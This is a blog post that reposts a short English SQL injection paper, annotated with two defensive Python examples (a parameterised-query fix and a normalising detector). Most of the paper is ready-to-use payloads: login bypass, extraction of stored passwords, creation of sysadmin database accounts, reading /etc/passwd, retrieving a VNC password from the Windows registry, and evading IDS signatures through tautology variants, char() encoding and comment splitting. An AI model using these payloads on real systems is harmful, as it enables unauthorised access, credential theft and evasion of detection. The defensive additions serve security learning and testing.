A few words on application security, which is also one aspect of checking how robust an application is. Below is a foreign author's summary of SQL injection techniques; after reading it you should have a fairly complete picture of SQL injection. It is an English technical write-up. I personally lean toward reading English technical articles, partly to train my ability to read technical documents, and I'd suggest everyone read some English technical material as well. That isn't "worshipping everything foreign": what some of the foreign experts have written up is genuinely worth learning from and sharing. I hope the content below helps anyone with "blind spots" in this area (the English is fairly simple, and anyone with basic computer English should have no trouble reading it, so I won't translate it here; reading more English technical material does no harm):
SQL Injection Paper
By zeroday.
zeroday [ at ] blacksecurity.org
1. Introduction.
2. Testing for vulnerabilities.
3. Gathering Information.
4. Data types.
5. Grabbing Passwords.
6. Create DB accounts.
7. MySQL OS Interaction.
8. Server name and config.
9. Retrieving VNC password from registry.
10. IDS Signature Evasion.
11. MySQL Input Validation Circumvention using Char().
12. IDS Signature Evasion using comments.
13. Strings without quotes.
1. Introduction.
When a box only has port 80 open, it's almost certain the admin will patch his server, so the best thing to turn to is web attacks. SQL injection is one of the most common web attacks. You attack the web application (ASP, JSP, PHP, CGI, etc.) rather than the web server or the services running on the OS.
SQL injection is a way of tricking the application by supplying a query or command as input via web pages. Most websites take parameters from the user, like a username and password or even their email, and they all use SQL queries.
2. Testing for vulnerabilities.
First off, you should start with something simple:
- Login: ' or 1=1--
- Pass: ' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are the simple ones; other ones to try are:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
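To see why the first two payloads work, here is an added example (not part of zeroday's paper) in Python against an in-memory SQLite table: `login_concat` splices the input into the query text the way a vulnerable login form does, and `login_param` binds it as a parameter, which is the fix. The table and the `alice` account are constructed sample data.

```python
import sqlite3

# Constructed sample data for this example: one account in an in-memory SQLite table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return conn

def login_concat(conn, login, password):
    # Vulnerable: the input becomes part of the SQL text, so a quote closes the literal,
    # "or 1=1" makes the WHERE clause true for every row and "--" comments out the rest.
    sql = ("SELECT count(*) FROM users WHERE login = '" + login
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0

def login_param(conn, login, password):
    # Fixed: placeholders are bound by the driver; the same input is compared as a
    # plain string against the login column and is never parsed as SQL.
    sql = "SELECT count(*) FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone()[0] > 0
```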
3. Gathering Information.
- ' or 1 in (select @@version)--
- ' union all select @@version--
These return the actual version of the server: the database version with the OS/service pack.
4. Data types.
Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS Access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5. Grabbing passwords.
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
6. Create DB accounts.
MS SQL
exec sp_addlogin 'name', 'password'
exec sp_addsrvrolemember 'name', 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CREATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'
Oracle
CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7. MySQL OS Interaction.
- ' union select 1,load_file('/etc/passwd'),1,1,1;
8. Server name and config.
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9. Retrieving VNC password from registry.
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
10. IDS Signature Evasion.
Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
11. MySQL Input Validation Circumvention using Char().
Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string = "root"):
--> ' union select * from users where login = char(114,111,111,116);
Load files in unions (string = "/etc/passwd"):
--> ' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
--> ' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12. IDS Signature Evasion using comments.
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' ||'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
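The evasions in sections 10 and 12 defeat a signature that only looks for the literal ' OR 1=1. As an added example (not from the paper), this Python detector applies the normalisation a filter or IDS rule would need before matching: it rewrites inline comments both as whitespace and as nothing (so UNI/**/ON becomes UNION), lower-cases, collapses whitespace, and then matches tautology, UNION SELECT, char() and comment patterns on either form. The pattern names are this example's own labels, not any product's signature ids.

```python
import re

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)   # closed inline comments only
WS_RE = re.compile(r"\s+")

def normalize(s, comment_subst):
    # Replace every /* ... */ by comment_subst (" " or ""), lower-case, collapse whitespace.
    s = COMMENT_RE.sub(comment_subst, s).lower()
    return WS_RE.sub(" ", s).strip()

# Assumed labels for this example; each regex runs on the normalised input.
PATTERNS = [
    # OR, an operand, then a comparison: covers 'x'='x', 2>1, 'x' like 'x%', in (...), between
    ("tautology", re.compile(r"\bor\b\s*'?[\w%]+'?\s*(=|like\b|>|<|in\b|between\b)")),
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("char-encoding", re.compile(r"\bchar\s*\(")),
    ("comment-terminator", re.compile(r"--\s*$")),
    ("open-comment", re.compile(r"/\*")),   # a /* with no */ survives normalisation
]

def classify(value):
    # Check both normalisations: comments as whitespace ('/**/OR/**/1 -> ' or 1) and as
    # nothing (UNI/**/ON -> union); report every pattern that fires on either form.
    forms = (normalize(value, " "), normalize(value, ""))
    return [name for name, rx in PATTERNS if any(rx.search(f) for f in forms)]
```

The split payload from section 12 (' or 1/* in one field, */=1-- in the other) is why the open-comment check exists: a per-field filter sees only the unterminated comment, so fields should also be checked after concatenation in the order the query joins them.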
13. Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)